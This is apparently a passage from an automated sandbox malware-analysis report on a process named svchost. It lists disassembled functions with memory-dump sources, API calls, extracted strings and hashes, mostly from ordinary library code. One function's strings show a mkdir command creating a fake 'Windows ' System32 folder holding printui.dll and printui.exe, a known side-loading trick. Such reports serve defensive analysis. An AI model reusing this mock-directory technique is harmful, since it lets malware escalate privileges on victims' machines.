            Download Yara Rule
            Memory Dump Source
            • Source File: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ddf024e5494fbb1b9238d2636b768ef58eca434702f95cbda3c3dc157ea1ff39
            • Instruction ID: 4c97fa6fd833a9e76881f4295507de45c59bd485769703f1275afbae5ca1a433
            • Opcode Fuzzy Hash: ddf024e5494fbb1b9238d2636b768ef58eca434702f95cbda3c3dc157ea1ff39
            • Instruction Fuzzy Hash: B4C08C8714EFC5C5C20205EC492A0343E421823C2A248848A4BE207645D60600C18202
            Function 68295290 Relevance: .0, Instructions: 1COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f3bb7faf65393c565c05d225c9238ea9b96888a9d37cf71d20cbd9873539937c
            • Instruction ID: 9722bb05da709e53f04c67b63ac9c7668817aec5a0fdc934dbbbe72f180d3e9b
            • Opcode Fuzzy Hash: f3bb7faf65393c565c05d225c9238ea9b96888a9d37cf71d20cbd9873539937c
            • Instruction Fuzzy Hash:
            Function 682849A0 Relevance: 61.7, APIs: 22, Strings: 13, Instructions: 450stringCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: strlen$getenv$_getcwdabortpthread_rwlock_rdlockpthread_rwlock_unlockstrchrstrcmp
            • String ID: .mo$GETTEXT_LOG_UNTRANSLATED$LANGUAGE$LC_ALL$LC_COLLATE$LC_CTYPE$LC_MESSAGES$LC_MONETARY$LC_NUMERIC$LC_TIME$LC_XXX$POSIX$c:/pgBuild64/share/locale
            • API String ID: 3750947721-4007712117
            • Opcode ID: 68401e532626dd40a5b3e62f6660bde5737612cb58aaa58669e7dc20f52abc5a
            • Instruction ID: f011620836108e1b7c2009a97093d1dd8185af0f3e35be7b8fe576876f480b0b
            • Opcode Fuzzy Hash: 68401e532626dd40a5b3e62f6660bde5737612cb58aaa58669e7dc20f52abc5a
            • Instruction Fuzzy Hash: 7002EDB6715A49CAEF24CF26A4507A837A9FB05B98FC48216DE6D177C4EF39C058C340
            Function 00007FFA41859EB0 Relevance: 58.1, APIs: 4, Strings: 29, Instructions: 382COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
            • API String ID: 2943138195-1482988683
            • Opcode ID: 87e75bcd8e13d27318c9b3ae135581f593509bc96b4b1190e75867da8dc5a9e5
            • Instruction ID: d92579305280aaa0bb8df7e5ab891dc58b343c2756a00902f4ca159b2015594f
            • Opcode Fuzzy Hash: 87e75bcd8e13d27318c9b3ae135581f593509bc96b4b1190e75867da8dc5a9e5
            • Instruction Fuzzy Hash: 31022B62E1D71298FB17AF64D8942BC3BA0FB0674CF908139DA0D26AB9DF68B544C740
            Function 00007FFA417E25B0 Relevance: 52.9, APIs: 21, Strings: 9, Instructions: 364COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID:
            • String ID: exists$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$mkdir "\\?\{}Windows \System32"${}Windows \System32${}Windows \System32\printui.dll${}Windows \System32\printui.exe${}Windows\System32\printui.exe
            • API String ID: 0-1428769780
            • Opcode ID: 7d5c9f599b346ccc149d9ba35ca209140a4bcc298a926c484218a5f1fff24114
            • Instruction ID: 68f38e1ec3e9f23518520c879c910f784b113822e6427af228ff7fdcffee015e
            • Opcode Fuzzy Hash: 7d5c9f599b346ccc149d9ba35ca209140a4bcc298a926c484218a5f1fff24114
            • Instruction Fuzzy Hash: 2D12513291CBC6D5E762EB14E4843EAA3A0FB99344F509135DBCC52A6AEF7CD185CB40
            Function 68286150 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 228librarystringloaderCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: malloc$AddressErrorHandleLastModuleProcfreegetenvstrlen
            • String ID: Control Panel\Desktop\ResourceLocale$GETTEXT_MUI$GetUserDefaultUILanguage$GetUserPreferredUILanguages$kernel32
            • API String ID: 3902095595-2289094478
            • Opcode ID: 21e21060ab22e19c0057544d49dc994c67e1fed5d76d5ac555a023b2adc1326b
            • Instruction ID: 38b5980a306fdc30fed06c58795f7f79584b12b8151343d07193e4e45856cd52
            • Opcode Fuzzy Hash: 21e21060ab22e19c0057544d49dc994c67e1fed5d76d5ac555a023b2adc1326b
            • Instruction Fuzzy Hash: 298114A232568A85FF24CB15E89876A63A1FB45B99FC44121DF6903BD9EF7DC089C700
            Function 68282EE0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 244stringfileCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: isspace$memcpy$fgetsstrchrstrlen$fclosefeoffopenstrncmp
            • String ID: /locale.$alia
            • API String ID: 523396729-523676055
            • Opcode ID: 04261a65dc28761269acb7c0fe0fd7a86babc1b59ef0ae2537ad78eed26fec8f
            • Instruction ID: d9bb909458fd9b5863b6121e32ed405b49ccec497aac49aec8738c1b05d92f08
            • Opcode Fuzzy Hash: 04261a65dc28761269acb7c0fe0fd7a86babc1b59ef0ae2537ad78eed26fec8f
            • Instruction Fuzzy Hash: C391E6B6705B9A84EF048B62A91436E77B2FB04BDDF848516CE6D17798EF39C069C300
            Function 68288090 Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 127stringfileCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: strlen$abortfopenfputcfreemallocmemcpypthread_mutex_lockpthread_mutex_unlockstrchrstrcmp
            • String ID: msgctxt $msgid $msgid_plural $msgstr ""$msgstr[0] ""$domain
            • API String ID: 985736648-3246038991
            • Opcode ID: 25d9d2dfaedb83549daff8720488ac3f8dd73d7e40b7b9db348dcd54c8cf9ab0
            • Instruction ID: 5976ffaac5bd5dce512531b6ec285da5e1eb20cad23f156419773a073e7cc1d2
            • Opcode Fuzzy Hash: 25d9d2dfaedb83549daff8720488ac3f8dd73d7e40b7b9db348dcd54c8cf9ab0
            • Instruction Fuzzy Hash: 4C418FA938164E94EE14DB57E8643B92392BB49FC5FC89632CD2A4B398DF3DC0588310
            Function 00007FFA417D06B0 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 54COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for bool$Invalid presentation type for floating-point$Invalid presentation type for integer$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type for wchar_t$Invalid presentation type specifier$Invalid type specification.$Zero modifier requires an arithmetic or pointer presentation type
            • API String ID: 909987262-1539746584
            • Opcode ID: e1e2e079e8a673b8d874318a6694035d43fa62b137bba7c28d4073b1fa81819e
            • Instruction ID: 9ea2bb76e53fe0cefafa456f18a9376f18b3ab948a03619392a22af0de8a8f86
            • Opcode Fuzzy Hash: e1e2e079e8a673b8d874318a6694035d43fa62b137bba7c28d4073b1fa81819e
            • Instruction Fuzzy Hash: 1F21B972A1C606DBE747BB18D8990B823B0AFA2740F918431D31D825B3FF6DA956CF14
            Function 6828BE20 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 231stringCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: setlocale$strcmpstrlen
            • String ID: _
            • API String ID: 3672321321-701932520
            • Opcode ID: 093befc57d05f290bc341a004cf99ce45b6b10a2a4c87869a066492637149da6
            • Instruction ID: bb44e0de26bf85c71b238b67b84ca6518bbae0052568d87d8f6fc6d2fa8fb069
            • Opcode Fuzzy Hash: 093befc57d05f290bc341a004cf99ce45b6b10a2a4c87869a066492637149da6
            • Instruction Fuzzy Hash: B481F3A670868D86DF11CB16E50036AA762F78ABC8FC4851ADFAD17B98DF38D549C700
            Function 00007FFA4185D788 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 290COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+$Replicator::operator[]
            • String ID: `anonymous namespace'
            • API String ID: 3863519203-3062148218
            • Opcode ID: 1025994bbc4b37975501bb550bfe6818d6f3d3c9b3b1cd8a21ac3afcfec9cd77
            • Instruction ID: e1326a16e940d8aa9ab38a15716e60cbb6b06b5680967de6fa084bdbef0c3346
            • Opcode Fuzzy Hash: 1025994bbc4b37975501bb550bfe6818d6f3d3c9b3b1cd8a21ac3afcfec9cd77
            • Instruction Fuzzy Hash: BCE18B76A0CB8289EB13EF25D4801ED77A1FB46788F408536EA4D67B66DF38E554C700
            Function 68288DB7 Relevance: 25.7, APIs: 17, Instructions: 202COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: _errnorealloc
            • String ID:
            • API String ID: 3650671883-0
            • Opcode ID: bdd0e6abeca3baa7d21ed68e019c67173be07a59379de568f70bcf34bb2b9ef9
            • Instruction ID: e6ee4a582ad34783fbcadd2d6336356e8e1fd09c990db6dfb05e23014d8f1b0d
            • Opcode Fuzzy Hash: bdd0e6abeca3baa7d21ed68e019c67173be07a59379de568f70bcf34bb2b9ef9
            • Instruction Fuzzy Hash: 2671EEB274568D8ADF14DF6AC4547A937A1BB09BDDFC04A22DE7A47BD4DB38C0898300
            Function 00007FFA4184DA20 Relevance: 23.1, APIs: 2, Strings: 11, Instructions: 395COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID:
            • String ID: was still active.$ while $, but got null pointer instead.$; expected to close $Closed $Closed while not open: $Could not copy string: buffer too small. $Expected to close $Null pointer registered.$Started new $Started twice:
            • API String ID: 0-1200026772
            • Opcode ID: 7f5a265fc4a22e81f92ce1bf5ddf6055b8cfea8561133b55d6f9cf4d7d04a184
            • Instruction ID: 2a9c3dcbe1f2affbbae3b2368bfbb23f3c2d9c3d8dff81e9e71bdf3871070d19
            • Opcode Fuzzy Hash: 7f5a265fc4a22e81f92ce1bf5ddf6055b8cfea8561133b55d6f9cf4d7d04a184
            • Instruction Fuzzy Hash: 51F1B162B1CA86A5EB13EF64E4413E96360FF56788F909132EA4D0366AFF3CE145C740
            Function 00007FFA41846F70 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 300COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID:
            • String ID: aborted after going into indeterminate state; it may have been executed anyway.$ was never closed properly!$Attempt to abort previously committed $UNPROCESSED ERROR: $Warning: $transaction$JT
            • API String ID: 0-522228489
            • Opcode ID: af2e65eb15c6bbe6b80f3051c97c81a05197d5e2f73e88e5e2e891247e8c97d9
            • Instruction ID: 46f5afcbd5b26ce3fea201bcd4b77055b38561b4ca3bbf5c7456e6b4708c35bf
            • Opcode Fuzzy Hash: af2e65eb15c6bbe6b80f3051c97c81a05197d5e2f73e88e5e2e891247e8c97d9
            • Instruction Fuzzy Hash: 85D18572B0CB8581EB12AB25E04437D6365FB56B98F608231DA9C07BA9EF7CE585C740
            Function 00007FFA417CF310 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 234COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Missing '}' in format string.$Number is too big$Unknown format specifier.
            • API String ID: 909987262-3302395901
            • Opcode ID: 654ada2351dd412e7b42ecaabb5c746f4456bbc99ee7c0637db2948bc8c4c4c0
            • Instruction ID: eff8d5c2e6b330b7ddb1bac29fe4c0fccde6012121758a7b58db92a47c2f57e6
            • Opcode Fuzzy Hash: 654ada2351dd412e7b42ecaabb5c746f4456bbc99ee7c0637db2948bc8c4c4c0
            • Instruction Fuzzy Hash: C4A17E22B08A46CAE712EF64D4442FD33B5EB55788F408632DB4E236AAEF38D556C744
            Function 682832C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 171COMMON
            Download Yara Rule
            APIs
            • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 682832D1
            • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 68283381
            • abort.MSVCRT ref: 682833EF
            • pthread_rwlock_wrlock.LIBWINPTHREAD-1 ref: 6828341A
            • free.MSVCRT ref: 6828345B
            • pthread_rwlock_unlock.LIBWINPTHREAD-1 ref: 68283467
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: abortfreepthread_mutex_lockpthread_mutex_unlockpthread_rwlock_unlockpthread_rwlock_wrlock
            • String ID: 8`)h$@`)h$c:/pgBuild64/share/locale
            • API String ID: 3379943660-3689085214
            • Opcode ID: 81afa4b7123b088a623e5ef584f2d6df36a93d5f6ab68d04874ba304e0dfd4de
            • Instruction ID: cafc0ba0edcefb4b94de35a7e00dbc7d41b28b4e68cd82c72fe0e5fa22b6ecd6
            • Opcode Fuzzy Hash: 81afa4b7123b088a623e5ef584f2d6df36a93d5f6ab68d04874ba304e0dfd4de
            • Instruction Fuzzy Hash: BC519FB170574FC1EF158F1BE8683A923A2BB45FC9FC88225CE6957394EF29C0698340
            Function 6828CCE0 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 300memoryCOMMON
            Download Yara Rule
            APIs
            • VirtualQuery.KERNEL32(?,?,?,?,?,682960F4,?,?,?,?,?,?,68281315), ref: 6828CE94
